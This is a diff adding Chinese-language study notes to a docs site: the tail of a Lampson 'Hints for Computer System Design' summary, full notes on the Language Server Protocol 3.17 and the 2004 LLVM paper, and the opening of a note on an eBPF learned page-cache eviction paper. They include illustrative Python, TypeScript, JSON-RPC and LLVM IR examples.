read_page(self, file_id: str, page_no: int) -> Optional[int]: + """通过 hint 找地址,用 label 校验;hint 错了就失效并扫描重建。""" + key = (file_id, page_no) + addr = self.page_map_hint.get(key) + if addr is not None: + label = self.labels.get(addr) + if label and label.file_id == file_id and label.page_no == page_no: + return addr # hint 命中且正确 + del self.page_map_hint[key] # hint 腐败,丢弃 + # Brute force 重建路径(真实系统会 scan disk) + for a, lab in self.labels.items(): + if lab.file_id == file_id and lab.page_no == page_no: + self.page_map_hint[key] = a + return a + return None + +# 演示:hint 被故意破坏后仍能靠 truth 恢复 +fs = FileSystem() +fs.write_page("doc", 0, disk_addr=100) +fs.page_map_hint[("doc", 0)] = 999 # 模拟 hint 错误 +assert fs.read_page("doc", 0) == 100 +``` + +端到端延伸:若 `doc` 要通过网络复制到另一台机器,**仅校验中间每一跳是不够的**——必须在接收方对完整文件做 checksum,与源端比对;中间层 CRC 只是减少重传工作量(性能优化),不是逻辑必需。 + +```python +import hashlib + +def transfer_end_to_end(src_bytes: bytes, noisy_channel) -> bytes: + """应用层端到端:唯一判定成功的标准在终点。""" + digest = hashlib.sha256(src_bytes).digest() + payload = src_bytes + digest + received = noisy_channel(payload) # 可能丢包/损坏 + if len(received) < 32: + raise RuntimeError("incomplete transfer, retry") + data, got_digest = received[:-32], received[-32:] + if hashlib.sha256(data).digest() != got_digest: + raise RuntimeError("corrupted, retry") + return data +``` + +## 代码示例 3:正常路径与最坏路径分开 + +Bravo 编辑器的 **piece table** 是 Lampson 举的经典案例:正常编辑只拆分 piece、追加新字符;piece 太多时**后台**做一次 compaction。下面用极简结构示意: + +```python +from dataclasses import dataclass +from typing import List, Tuple + +@dataclass +class Piece: + start: int # 在 underlying buffer 中的偏移 + length: int + +class PieceTableEditor: + """正常情况 O(1) 插入;最坏情况触发 compaction。""" + + def __init__(self, text: str): + self.buffer = text + self.pieces: List[Piece] = [Piece(0, len(text))] + self.compact_threshold = 50 + + def insert(self, pos: int, s: str) -> None: + # 正常路径:追加到 buffer,拆分 piece(省略边界查找细节) + off = len(self.buffer) + self.buffer += s + # ... 在 pos 处拆分并插入新 Piece(off, len(s)) ... + self.pieces.append(Piece(off, len(s))) # 简化示意 + if len(self.pieces) > self.compact_threshold: + self._compact_background() + + def _compact_background(self) -> None: + """最坏情况 / 维护路径:合并成单 piece,换稳定结构。""" + self.buffer = self.render() + self.pieces = [Piece(0, len(self.buffer))] + + def render(self) -> str: + return "".join(self.buffer[p.start : p.start + p.length] for p in self.pieces) +``` + +要点:**用户日常打字走快路径**;长时间编辑后的「卡顿」用批量整理解决,而不是让每次按键都承担全量复制的成本。 + +## 与其他思想的联系 + +| 概念 | 关系 | +|------|------| +| [[paxos]] / [[raft]] | 日志(Log updates)+ 可重启操作,是分布式里的原子/可恢复实例 | +| [[tcp]] | 端到端可靠性由 TCP 保证;IP 层 hint 式转发不承诺送达 | +| Parnas 信息隐藏 | Lampson 的「Keep secrets」与模块秘密一致 | +| Brooks《人月神话》 | 「Plan to throw one away」直接呼应第二系统陷阱 | +| RISC vs CISC | 「Make it fast, rather than general」的硬件版 | + +## 实践清单(给零基础读者的行动版) + +1. **画接口再写代码**:先写「客户端需要哪些假设」,再写实现;用一页纸列出三个冲突目标如何取舍 +2. **量测再优化**:Lampson 引用 Interlisp-D 靠 profiling 提速 10 倍——没有数据不要猜热点 +3. **默认路径要极简**:错误处理、边界情况可以慢,但 99% 的请求应走短路径 +4. **任何缓存都要有失效策略**:功能缓存(cache)与可能错的加速(hint)区分对待 +5. **第一版当原型**:尤其功能是新的时候,计划重写比否认现实便宜 +6. **过载时主动降级**:限流、丢低优先级任务、返回 503,优于全体用户一起卡死 + +## 局限与争议 + +Lampson 自己在开篇就列了免责声明:这些不是定律、不总适用、不少条目互相张力(例如「不要隐藏能力」vs「保持秘密」)。论文例子来自 1970–80 年代小型机与工作站,**直接照搬**到今日云原生或 GPU 集群会失真。但其价值在于提供**判断 trade-off 的词汇表**:当你在设计 API、缓存层、容错边界时,可以问——这是在优化功能、速度还是容错?动的是接口还是实现?用的是 truth 还是 hint? + +## 延伸阅读 + +- 原文 PDF:[Hints for Computer System Design](https://bwlampson.site/33-Hints/Acrobat.pdf) +- Saltzer, Reed, Clark:端到端原则经典文(Lampson 在容错章节引用) +- David Parnas:「On the Criteria To Be Used in Decomposing Systems into Modules」 +- Jon Bentley:《Writing Efficient Programs》——Lampson 在速度章节推荐的补充读物 + +## 一句话总结 + +**Butler Lampson 用几十年造系统的经验告诉我们:好系统靠清晰的接口契约、对正常与最坏情况的分治、用 truth 约束 hint、以及在应用层端到端地验证正确性——简单、可分析、舍得用蛮力,往往胜过一开始就把所有聪明写进第一版。** diff --git a/src/content/docs/papers/language-server-protocol-spec.md b/src/content/docs/papers/language-server-protocol-spec.md new file mode 100644 index 000000000..84a455766 --- /dev/null +++ b/src/content/docs/papers/language-server-protocol-spec.md @@ -0,0 +1,343 @@ +--- +title: Language Server Protocol — 让编辑器共享同一套「语言大脑」的 USB 协议 +来源: https://microsoft.github.io/language-server-protocol/specifications/lsp/3.17/specification/ +日期: 2026-06-13 +分类: CLI +子分类: 编辑器与 IDE +provenance: pipeline-v3 +--- + +## 是什么 + +**Language Server Protocol(LSP,语言服务器协议)** 是 Microsoft 牵头维护的一份开放规范,定义了**编辑器/IDE(客户端)** 与**语言分析服务(服务端)** 之间如何通过 **JSON-RPC 2.0** 交换消息。当前稳定版本为 **3.17**(2022-05-10 发布)。 + +日常类比:你去不同国家的医院看病,以前每家医院有自己的病历格式——北京一套、东京一套、柏林一套,换医院就得重新建档。LSP 相当于**国际通用的电子病历接口**:VS Code、Neovim、Helix、Zed、Emacs 都是「医院前台」,Rust Analyzer、Pyright、gopls、clangd 都是「专科医生」。前台只负责展示和收集症状(光标位置、打开的文档),医生只负责诊断(补全、跳转、诊断),双方说同一种「病历语言」,所以**写一次语言服务,所有编辑器都能用**。 + +技术定义:LSP 在 JSON-RPC 之上定义三类消息——**Request**(要回复)、**Response**(回复结果)、**Notification**(单向通知,无 id)。消息按功能分成 **Lifecycle**(初始化)、**Document Synchronization**(文档同步)、**Language Features**(补全/跳转/诊断等)、**Workspace Features**(全项目符号搜索)、**Window Features**(进度条/日志)几大章。规范用 TypeScript interface 描述所有数据结构,但**不要求**实现语言必须是 TypeScript。 + +## 为什么重要 + +不理解 LSP,下面这些事都没法解释: + +- 为什么 VS Code 装一个 Rust 插件后,Neovim 用 `rust-analyzer` 也能得到几乎相同的体验——底层是同一套协议,不是同一套代码 +- 为什么 `gopls`、`pyright`、`typescript-language-server` 都能独立进程运行——编辑器通过 stdio / socket 跟子进程说话,崩溃不会拖垮整个 IDE +- 为什么 Cursor / Zed 能「复用 VS Code 生态的语言服务」——它们实现的是 LSP **客户端**,不是重新实现每种语言的编译器前端 +- 为什么 MCP 规范里常提到 LSP——MCP 的设计直接借鉴了 LSP 的 **capability negotiation**(能力协商)模式 + +## 核心概念 + +LSP 3.17 规范可以拆成 **五层**,由下往上: + +### 1. Base Protocol(传输 + 帧格式) + +JSON-RPC 消息前面必须带 **LSP 报文头**(类似 HTTP header): + +``` +Content-Length: 119\r\n +\r\n +{"jsonrpc":"2.0","id":1,"method":"initialize","params":{...}} +``` + +- `Content-Length`:后面 JSON body 的字节数(UTF-8) +- 默认 `Content-Type`:`application/vscode-jsonrpc; charset=utf-8` +- 传输通道常见为 **stdio**(子进程)、**socket**、**named pipe**;规范**不支持 JSON-RPC batch**(不能一次发多个 request) + +三种消息形态: + +| 类型 | 有 `id`? | 需要回复? | 典型用途 | +|------|-----------|------------|----------| +| Request | 是 | 是 | `textDocument/completion` | +| Response | 是(匹配 request) | — | 返回补全列表 | +| Notification | 否 | 否 | `textDocument/didChange` | + +### 2. 基本数据结构 + +规范里几乎所有语言功能都围绕 **`[TextDocumentIdentifier, Position]`** 这一元组: + +```typescript +// 规范中的 Position:0-based,line 是行号,character 是 UTF-16 码元偏移 +interface Position { + line: number; + character: number; +} + +interface Range { + start: Position; + end: Position; +} + +interface TextDocumentItem { + uri: string; // 如 file:///path/to/main.rs + languageId: string; // 如 "rust" + version: number; // 文档版本,每次变更递增 + text: string; // 全文(didOpen 时发送) +} +``` + +**注意**:`character` 是 **UTF-16 code unit** 偏移,不是字节数也不是 Unicode 码点数。处理 emoji 或多字节字符时,客户端和服务端必须一致,否则跳转/补全会错位。 + +### 3. Lifecycle(生命周期) + +连接建立后的固定顺序: + +``` +Client Server + |---- initialize (request) ---->| + |<---- InitializeResult --------| (含 server capabilities) + |---- initialized (notify) ---->| + |---- 其他 request/notify ----->| +``` + +- **`initialize`**:交换 `ClientCapabilities` 与 `ServerCapabilities`,协商双方支持哪些功能 +- **`initialized`**:客户端通知「我准备好了」;服务端可在此后 **动态注册** 能力(`client/registerCapability`) +- **`shutdown` / `exit`**:优雅关闭 + +服务端在 `initialize` 响应里声明例如 `completionProvider`、`definitionProvider`;客户端在请求里声明例如 `textDocument.completion.contextSupport`。 + +### 4. Document Synchronization(文档同步) + +客户端**必须**实现(不可 opt-out)的三条通知: + +| 方法 | 方向 | 含义 | +|------|------|------| +| `textDocument/didOpen` | C→S | 打开文档,附带全文 | +| `textDocument/didChange` | C→S | 文档变更(**Full** 或 **Incremental** 同步) | +| `textDocument/didClose` | C→S | 关闭文档 | + +服务端要么**三者全支持**,要么**三者全不支持**——不能只做 `didOpen` 不做 `didChange`。 + +增量同步示例(客户端只发变更片段): + +```json +{ + "jsonrpc": "2.0", + "method": "textDocument/didChange", + "params": { + "textDocument": { "uri": "file:///proj/main.ts", "version": 2 }, + "contentChanges": [ + { + "range": { + "start": { "line": 10, "character": 4 }, + "end": { "line": 10, "character": 4 } + }, + "text": "console.log('hi');\n" + } + ] + } +} +``` + +### 5. Language Features(语言功能) + +在 `[document, position]` 上执行的核心能力,3.17 规范包括但不限于: + +- **Syntactic**:`completion`、`signatureHelp`、`hover`、`documentHighlight` +- **Navigation**:`definition`、`typeDefinition`、`implementation`、`references` +- **Semantic**:`documentSymbol`、`codeAction`、`codeLens`、`documentLink` +- **Diagnostic**:`publishDiagnostics`(notification,服务端主动推) +- **Formatting**:`formatting`、`rangeFormatting`、`onTypeFormatting` +- **Refactoring**:`rename`、`prepareRename` +- **3.17 新增**:`inlayHint`(类型/参数名内联提示)、`typeHierarchy`、`inlineValue` 等 + +Workspace 级功能如 `workspace/symbol`(全项目搜索符号)、`workspace/executeCommand`(执行重构命令)在单独章节定义。 + +### 6. Capabilities(能力协商) + +LSP 的核心设计哲学:**不假设对方支持一切**。双方只在 `initialize` 时交换能力表;若客户端没声明 `textDocument.completion.contextSupport`,服务端就不该依赖 `CompletionContext` 字段。 + +动态注册示例(服务端在 `initialized` 之后注册 `willSaveWaitUntil`): + +```json +{ + "jsonrpc": "2.0", + "method": "client/registerCapability", + "params": { + "registrations": [{ + "id": "79eee87c-c409-4664-8102-e03263673f6f", + "method": "textDocument/willSaveWaitUntil", + "registerOptions": { + "documentSelector": [{ "language": "typescript" }] + } + }] + } +} +``` + +## 实践案例 + +### 案例 1:客户端发起「跳转到定义」 + +用户在第 3 行第 12 列点击「Go to Definition」,客户端发送: + +```json +{ + "jsonrpc": "2.0", + "id": 42, + "method": "textDocument/definition", + "params": { + "textDocument": { + "uri": "file:///home/user/src/main.cpp" + }, + "position": { + "line": 3, + "character": 12 + } + } +} +``` + +服务端返回 `Location` 或 `LocationLink[]`(3.14+,需客户端声明 `linkSupport`): + +```json +{ + "jsonrpc": "2.0", + "id": 42, + "result": [{ + "uri": "file:///home/user/include/util.hpp", + "range": { + "start": { "line": 15, "character": 0 }, + "end": { "line": 15, "character": 20 } + } + }] +} +``` + +LSP **故意不传输 AST 或类型图**——只传编辑器能直接用的 URI + Range。语言领域的复杂结构留在服务端进程内部,协议保持「薄」。 + +### 案例 2:用 TypeScript 写一个最小 Language Server + +下面是一个能响应 `initialize` 和 `textDocument/completion` 的极简骨架(基于官方 `vscode-languageserver` 库): + +```typescript +import { + createConnection, + TextDocuments, + ProposedFeatures, + InitializeParams, + TextDocumentSyncKind, + CompletionItem, + CompletionItemKind +} from 'vscode-languageserver/node'; +import { TextDocument } from 'vscode-languageserver-textdocument'; + +const connection = createConnection(ProposedFeatures.all); +const documents = new TextDocuments(TextDocument); + +connection.onInitialize((params: InitializeParams) => { + return { + capabilities: { + textDocumentSync: TextDocumentSyncKind.Incremental, + completionProvider: { resolveProvider: false } + } + }; +}); + +connection.onCompletion((): CompletionItem[] => { + return [ + { + label: 'helloLsp', + kind: CompletionItemKind.Function, + detail: 'Demo completion from minimal LSP server' + } + ]; +}); + +documents.listen(connection); +connection.listen(); +``` + +编辑器用 stdio 启动这个进程后,库会自动处理 `Content-Length` 帧、`didOpen`/`didChange` 同步、以及 capability 握手——手写时最容易错的就是**帧格式**和**UTF-16 偏移**。 + +### 案例 3:诊断推送(publishDiagnostics) + +与 request/response 不同,诊断是服务端**主动推送**的 notification: + +```json +{ + "jsonrpc": "2.0", + "method": "textDocument/publishDiagnostics", + "params": { + "uri": "file:///proj/app.py", + "diagnostics": [{ + "range": { + "start": { "line": 4, "character": 0 }, + "end": { "line": 4, "character": 10 } + }, + "severity": 1, + "code": "E0001", + "source": "pyright", + "message": "Undefined name 'foo'" + }] + } +} +``` + +客户端收到后在 gutter 画红波浪线。每次分析完成可全量替换该文档的 diagnostics 列表。 + +## 踩过的坑 + +1. **stdout 不能打 debug log**:stdio 传输时 stdout 专用于 LSP 帧,任何 `console.log` 到 stdout 都会破坏 `Content-Length` 解析。日志必须走 **stderr**。 + +2. **UTF-16 character 偏移**:规范写死用 UTF-16 code unit。Rust/Python 里按字节或 Unicode scalar 算列号,和 VS Code 不一致时,补全范围会「偏一格」。 + +3. **didOpen/didChange/didClose 必须成套**:服务端不能声明只同步 open 不同步 change;客户端也不能声称支持 LSP 却跳过 `didClose`。 + +4. **capability 是双向契约**:服务端发了客户端不认识的 capability 字段,客户端应**忽略**而非报错;但服务端若用了客户端未声明的可选字段,行为未定义。 + +5. **不支持 batch**:不能在一个 JSON-RPC batch 里塞多个 request。高并发场景要排队或 multiplex 多个连接。 + +6. **3.17 的 WorkspaceSymbol 可延迟 resolve**:若服务端返回不带 range 的 `WorkspaceSymbol`,必须等客户端声明 `workspace.symbol.resolveSupport`,否则只能返回完整 `Location`。 + +## 适用 vs 不适用场景 + +**适用**: + +- 为一种编程语言提供 IDE 级功能,且希望 **VS Code / Neovim / Emacs / Zed 等多客户端复用** +- 语言分析很重(类型检查、索引),需要**独立进程**隔离崩溃和 CPU +- 团队已有编译器/分析器,只想加一层「编辑器适配」而非重写每个 IDE 插件 + +**不适用**: + +- 只做单一编辑器、单一语言的深度集成 → 直接调编辑器原生 API 可能更简单(如 VS Code Extension API) +- 需要**双向流式**大 payload(传整棵 AST)→ LSP 故意保持薄,应走自定义 RPC 或 LSIF +- 亚毫秒级延迟的键入反馈 → JSON-RPC + 进程边界有固定开销;极端场景可能 in-process +- 非文本文档(纯图形、Notebook 单元格语义)→ 需 Notebook Document Sync 扩展,比 plain text 复杂一个数量级 + +## 历史小故事(可跳过) + +- **2016**:Microsoft 在 TypeScript 语言服务经验上提出 LSP,目标统一 VS Code 与其他编辑器的能力接入方式。 +- **2016-06-30**:发布 LSP 1.0;随后 Rust(RLS → rust-analyzer)、Go(gopls)、Python(Pylance/Pyright)等社区迅速跟进。 +- **2022-05-10**:LSP **3.17** 定稿,新增 Inlay Hint、Type Hierarchy、Inline Value、Notebook 同步增强等。 +- **LSIF**(Language Server Index Format):LSP 负责「在线交互」,LSIF 负责「离线预计算索引」——大仓库 CI 里先跑 LSIF,IDE 再消费,与 LSP 互补。 +- **类比链**:LSP 之于编辑器 ≈ **MCP 之于 LLM 客户端**——都是 JSON-RPC + capability negotiation,让「工具」与「宿主」解耦。 + +## 学到什么 + +1. **协议故意停留在编辑器抽象层**:传 URI、Range、Diagnostic,不传 AST——降低客户端负担,把复杂度关在 language server 进程里。 +2. **能力协商先于功能调用**:`initialize` 是双向契约,不是服务端单方面「报菜单」;动态注册让功能可以按需启用。 +3. **文档同步是硬约束**:Language Features 再聪明,如果 `didChange` 版本和全文不一致,补全和诊断全是错的。 +4. **Notification 与 Request 分工明确**:诊断、日志、进度用 notification 推;需要结果的操作(completion、definition)用 request。 +5. **写一次,到处跑** 的真正成本在「测试矩阵」——同一 server 要对多种 client 的 capability 组合做兼容,而不是协议本身难写。 + +## 延伸阅读 + +- 规范全文:[LSP 3.17 Specification](https://microsoft.github.io/language-server-protocol/specifications/lsp/3.17/specification/) +- 官方实现指南:[Implementing Language Server](https://microsoft.github.io/language-server-protocol/overviews/server/) +- 官方客户端指南:[Implementing Language Client](https://microsoft.github.io/language-server-protocol/overviews/client/) +- 参考库:[vscode-languageserver-node](https://github.com/microsoft/vscode-languageserver-node)(Node 服务端/客户端 SDK) +- 规范仓库:[microsoft/language-server-protocol](https://github.com/microsoft/language-server-protocol) +- LSIF 规范:[Language Server Index Format](https://microsoft.github.io/language-server-protocol/specifications/lsif/0.6.0/specification/) + +## 关联 + +- [[tree-sitter-2018]] —— Tree-sitter 提供增量 CST,常与 LSP 配合做语法高亮;LSP 管语义,Tree-sitter 管结构 +- [[mcp-spec]] —— MCP 借鉴 LSP 的能力协商与 JSON-RPC 分层,可对比阅读 +- [[ast-grep]] —— 基于 Tree-sitter 的结构化搜索,与 LSP 的 refactor 路径不同但场景相邻 +- [[standard-ml]] —— 早期 IDE 多为单编辑器深度集成;LSP 代表「语言服务与 UI 分离」的现代路线 + +## 反向链接 + + + +(暂无反向链接) + diff --git a/src/content/docs/papers/lattner-llvm-2004.md b/src/content/docs/papers/lattner-llvm-2004.md new file mode 100644 index 000000000..6e5f2747f --- /dev/null +++ b/src/content/docs/papers/lattner-llvm-2004.md @@ -0,0 +1,257 @@ +--- +title: LLVM: A Compilation Framework for Lifelong Program Analysis & Transformation (Lattner & Adve, CGO 2004) +来源: https://www.aaronbradley.org/cs6235/llvm-cgo04.pdf +日期: 2026-06-13 +分类: 编程语言 +子分类: 类型与 PL 理论 +provenance: pipeline-v3 +--- + +## 是什么 + +Chris Lattner 和 Vikram Adve 在 2004 年 IEEE/ACM CGO 会议上发表的这篇论文,描述了 **LLVM** 的原始设计动机和架构。LLVM 最初代表 *Low Level Virtual Machine*,如今已不再是缩写,而是整个编译器基础设施项目的品牌名。 + +论文的核心主张只有一句话:**与其为每种语言从头写一套「前端 + 优化器 + 后端」,不如把「前端」和「后端」之间的中间层(IR)独立出来,做一套可复用的分析与变换框架——无论前端是 C、C++、Rust 还是 Swift,后端是 x86、ARM 还是 GPU——都能共享同一套优化管道。** + +这就是「Lifelong」(终身)的含义:IR 在编译期、链接期、甚至运行期都可以持续接受分析和优化,不必在某个阶段就固化成机器码丢弃。 + +日常类比:你要开一家跨国连锁餐厅。 + +- **传统编译器** = 每个国家单独建一条厨房线,厨师、工具、流程都不一样。法国厨师用法式做法,日本厨师用和式做法——彼此不能共用任何经验。 +- **LLVM 的做法** = 在所有国家用**同一种标准化菜谱格式(IR)**记录每道菜。不管原始菜谱来自法国料理书还是日本料理书,标准化之后都进入同一套「中间厨房」做统一优化(省时间、省材料),最后再按当地灶具(x86 / ARM)翻译成最终动作。 + +## 为什么重要 + +这篇论文发表时,LLVM 还是一个学术研究项目(2000 年起步于伊利诺伊大学香槟分校)。如今它已经是: + +1. **Apple 生态的基石**:macOS、iOS 的 Xcode 自 2011 年起全部使用 Clang/LLVM;Swift 语言本身就是以 LLVM 为目标设计的。 +2. **Rust 语言的默认后端**;Clang 作为 C/C++ 前端广泛替代 GCC。 +3. **GPU 编程**(NVVM / AMDGPU)、**WebAssembly**、**数据库 JIT**(PostgreSQL JIT)、**高性能语言**(Julia、Kotlin/Native)的后端。 +4. **2012 年获 ACM Software System Award**——这是对其影响力最直接的国际认证。 + +理解这篇论文,就能理解「为什么 LLVM 能从一个博士论文成长到改变整个软件工程版图」。 + +## 核心概念 + +### 1. 三种 IR 形式 + +LLVM 的 IR 有三种等价表示,各自服务于不同场景: + +| 形式 | 用途 | 类比 | +|------|------|------| +| **Assembly IR**(文本) | 人类阅读、调试、手写 | 菜谱的手写副本 | +| **In-memory IR** | 编译器前端直接生成的内存结构 | 厨房里的电子菜单系统 | +| **Bitcode**(二进制) | 持久化存储、跨模块链接 | 标准化的电子文件,可随时加载 | + +关键洞察:三种形式**完全等价**,可以互相转换。这意味着你可以在编译期把 IR 存成文件(bitcode),稍后在链接期或运行期再加载回来继续优化。 + +### 2. SSA 形式(Static Single Assignment) + +LLVM IR 的每条指令都采用 **SSA 形式**——每个变量(寄存器)在整个函数生命周期内**只被赋值一次**。 + +```c +// 源程序 +x = a + b; +x = x * 2; + +// 编译成 LLVM IR 后 +%1 = add i32 %a, %b // %1 = a + b,只赋值一次 +%2 = mul i32 %1, 2 // %2 = %1 * 2,%1 不会被重新赋值 +``` + +日常类比:SSA 就像给每个人的每段人生贴上时间戳标签。在 SSA 之前,「x」是一个人——可能早上是厨师、下午是服务员、晚上是收银员,你很难追踪「此刻的他」到底是谁。SSA 则把他拆成三段不重叠的人生:%1(厨师阶段)、%2(服务员阶段)、%3(收银员阶段)——每段都清晰、不可篡改,分析起来极其简单。 + +### 3. 模块化优化管道 + +LLVM 把优化拆成**独立的 Pass(.pass 阶段)**,每个 Pass 只做一件事: + +``` +前端 IR ──→ [EliminateDeadStores] ──→ [LICM] ──→ [InstCombine] ──→ [RegAlloc] ──→ 机器码 +``` + +每个 Pass 接收前一阶段的 IR、做变换、输出新的 IR。Pass 之间通过 `FunctionPassManager` 协调。 + +优势: +- **可组合**:任意排列 Pass 顺序来探索不同优化策略 +- **可调试**:每个 Pass 前后都能输出 IR 做对比 +- **可复用**:一个写好的 Pass 可以被所有前端(C、C++、Rust、Swift)共享 + +### 4. 前端/后端分离 + +``` + C 源码 C++ 源码 Rust 源码 Swift 源码 + │ │ │ │ + ▼ ▼ ▼ ▼ + GCC frontend Clang frontend rustc frontend Swift frontend + │ │ │ │ + └────────┬────────┴────────┬───────┴────────────────┘ + │ │ + ▼ ▼ + LLVM IR(统一中间表示,与语言无关) + │ + ▼ + ┌───────┴────────┐ + │ 优化 Pass 管道 │ ← 所有语言共享 + └───────┬────────┘ + │ + ▼ + ┌───────┴────────────┬────────────┐ + │ │ │ + ▼ ▼ ▼ + x86 后端 ARM 后端 GPU 后端 + │ │ │ + ▼ ▼ ▼ + x86 机器码 ARM 机器码 PTX / AMDGPU 码 +``` + +这就是「终身」的含义:**IR 是活的**。从语言前端到最终机器码,中间每一阶段 IR 都可以被保存、加载、再分析、再优化。 + +## 代码示例一:C 代码到 LLVM IR + +下面展示一段简单的 C 函数如何被编译成 LLVM IR。 + +```c +// --- 源程序:C 代码 --- +int add(int a, int b) { + return a + b; +} +``` + +```llvm +; --- 编译成 LLVM Assembly IR --- +define i32 @add(i32 %a, i32 %b) nounwind { +entry: + %result = add i32 %a, %b ; 每个变量只赋值一次(SSA) + ret i32 %result +} +``` + +注意: +- `i32` 表示 32 位整数,类型系统嵌入在 IR 中 +- `%a` 和 `%b` 是函数参数,%result 是 SSA 变量 +- 没有控制流——函数太简单,不需要基本块(basic block)之间的跳转 + +### 更复杂的示例:带循环的求和 + +```c +// --- 源程序:C 代码 --- +int sum(int n) { + int total = 0; + for (int i = 0; i < n; i++) { + total += i; + } + return total; +} +``` + +```llvm +; --- 编译成 LLVM Assembly IR --- +define i32 @sum(i32 %n) nounwind { +entry: + %total = alloca i32 ; 在栈上分配变量 total + %i = alloca i32 ; 在栈上分配变量 i + store i32 0, ptr %total ; total = 0 + store i32 0, ptr %i ; i = 0 + br label %loop ; 跳到循环头 + +loop: ; 循环基本块 + %i.val = load i32, ptr %i ; 读 i + %cond = icmp slt i32 %i.val, %n ; i < n ? + br i1 %cond, label %body, label %exit ; 条件分支 + +body: ; 循环体 + %total.val = load i32, ptr %total + %i.val2 = load i32, ptr %i + %sum = add i32 %total.val, %i.val2 ; total += i + store i32 %sum, ptr %total + %i.next = add i32 %i.val2, 1 ; i++ + store i32 %i.next, ptr %i + br label %loop ; 回到循环头 + +exit: ; 退出点 + %final = load i32, ptr %total + ret i32 %final +} +``` + +这个 IR 展示了 LLVM 的几个关键特征: + +- **基本块(entry / loop / body / exit)**:用 `br` 和条件分支连接,形成控制流图(CFG) +- **SSA 限制**:由于 IR 本身要求每个寄存器只赋值一次,但 C 语言中 `total` 在循环里被多次修改,所以编译器用 `load`/`store` 配合栈上的 `alloca` 变量来处理这种「可重写」的场景。 +- **优化潜力**:这个 IR 还能被进一步简化——例如循环不变量消除、标量替换、甚至整个循环被 `total = n * (n-1) / 2` 取代。这就是「终身分析」的妙用。 + +## 代码示例二:LLVM 的优化 Pass 能做什么 + +假设一段 C 代码包含循环不变量: + +```c +// --- 源程序 --- +int slow(int n, int* arr) { + int sum = 0; + int limit = 100 * 3; // 100 * 3 是循环不变量 + for (int i = 0; i < n; i++) { + if (arr[i] < limit) { + sum += arr[i]; + } + } + return sum; +} +``` + +LLVM 的优化管道会逐步处理: + +``` +Pass 1 [LICM - 循环不变量代码移动]: + 把 limit = 100 * 3 移到循环外面(不再每次迭代重算) + +Pass 2 [InstCombine - 指令合并]: + 把 100 * 3 在编译期直接算出 300(常量传播) + +Pass 3 [LoopUnroll - 循环展开]: + 如果 n 很小,把循环展开成顺序代码,消除分支开销 + +Pass 4 [Vectorize - 自动向量化]: + 把标量加法变成 SIMD 指令(一次处理 4 个整数) +``` + +这就是论文中「Lifelong」的精髓:从前端拿到 IR 开始,到最终生成机器码之前,**IR 可以被反复改造、精简、加速**——而且每一步都保证语义等价。 + +## 论文的关键贡献 + +1. **统一 IR 的设计**:一个语言无关的、SSA 形式的中间表示,同时支持多种前端和多种后端 +2. **终身分析模型**:IR 在编译期、链接期、运行期都可以接受分析和变换(支持 AOT、JIT、LTO) +3. **模块化 Pass 架构**:每个优化/分析是独立模块,可组合、可排序、可调试 +4. **三种 IR 格式的共存**:文本可读、内存高效、二进制紧凑,服务不同生命周期阶段 + +## 与 GCC 的对比(论文中的核心动机) + +| 维度 | GCC | LLVM | +|------|-----|------| +| 架构 | 前端和后端紧耦合 | 前端/IR/后端三层分离 | +| 优化管道 | 内嵌在编译器内部,难以外部扩展 | 模块化 Pass,可自由组合 | +| JIT 支持 | 需要额外项目(如 GCCJIT) | IR 本身设计就支持运行时编译 | +| 增量编译 | 重新编译整个函数 | bitcode 可单独存储,链接期可重新优化 | +| 目标扩展 | 需要修改编译器核心代码 | 只需实现新前端或新后端 | + +## 自检清单 + +读完可以用下面问题自测是否真懂: + +- [ ] 能否用自己的话解释 SSA 形式是什么、为什么要用它? +- [ ] 三种 IR 格式分别适合什么场景?为什么需要三种? +- [ ] 为什么说 LLVM 的优化是「终身」的,而不是只在编译期做一次? +- [ ] 一个 Pass 只做一个变换——这跟 GCC 的做法有什么本质区别? +- [ ] 前端/后端分离的架构,对一门新语言(比如你设计的 DSL)有什么好处? + +## 延伸阅读 + +- Chris Lattner, *The Architecture of Open Source Applications: LLVM* (2011) — 更详细的架构讲解 +- LLVM Language Reference Manual — 最新的 IR 语法和语义文档 +- Chris Lattner 的 AOSABook 章节 (2011) — LLVM 在实际生产中的演进 +- MLIR (2019+) — LLVM 团队的下一代多粒度 IR 项目,延续了同一设计理念 + +## 小结 + +这篇 2004 年的论文描述了一个朴素但极具远见的想法:**把编译器的「中间部分」抽出来,做成一个通用的分析与变换平台。** 这个决定后来被证明是过去二十年最有价值的软件工程决策之一——Apple、Rust、Swift、Julia、PostgreSQL、Nvidia、Sony PS4 都在用它。 + +对你我这样的学习者:下次看到任何「新语言新框架」,先问——它的 IR 是自创的还是用 LLVM/MLIR?**如果后者,那这篇 2004 年的论文就是它最深的根基。** diff --git a/src/content/docs/papers/learnedcache-ebpf-integrated-perceptron-based-eviction-policy-arxiv-2605-26168.md b/src/content/docs/papers/learnedcache-ebpf-integrated-perceptron-based-eviction-policy-arxiv-2605-26168.md new file mode 100644 index 000000000..a251ddb7c --- /dev/null +++ b/src/content/docs/papers/learnedcache-ebpf-integrated-perceptron-based-eviction-policy-arxiv-2605-26168.md @@ -0,0 +1,244 @@ +--- +title: LearnedCache — 用 eBPF + 单层感知机给 Linux 页缓存装上"预测大脑" +来源: https://arxiv.org/abs/2605.26168 +日期: 2026-06-13 +分类: 操作系统 +子分类: 内核与虚拟化 +provenance: pipeline-v3 +--- + +## 是什么 + +LearnedCache 是一篇 2026 年 5 月发表的论文,核心想法很简单:给 Linux 操作系统的页缓存(page cache)换一个"更聪明"的淘汰策略,用机器学习模型代替传统的 FIFO/LRU,从而减少磁盘访问、提升性能。 + +## 日常类比:图书馆的书架 + +想象图书馆有 100 个书架位(等于页缓存大小),每天读者借走各种书(磁盘页/page)。书架满了,管理员必须决定"谁该被清走"。 + +传统策略(FIFO)像这样:**先来先走**。第一本被放进书架的书,排到最末尾时就会被丢出去——不管它是不是大家最常借的热门书。 + +LRU(最近最少使用)稍微聪明一点:**最久没人碰的书先走**。但如果一本书"每隔 100 天被借一次",LRU 会以为它"很久没用",然后把它扔掉——结果它被扔掉之后立刻又被借了,造成"误判"。 + +LearnedCache 的做法是:给每本书建一个**个人档案**,记录它被借的时间间隔、这本书有多厚、上次和这次借之间隔了多久……然后用一个简单的数学模型(单层感知机)来**预测这本书下次什么时候会被借**。预测"下次借"时间最长的书,先被清走。 + +就像你开始整理书架时,不再看"谁来得最早",而是看"谁最可能不会再被需要"。 + +## 核心概念 + +### 1. Linux 页缓存(Page Cache) + +Linux 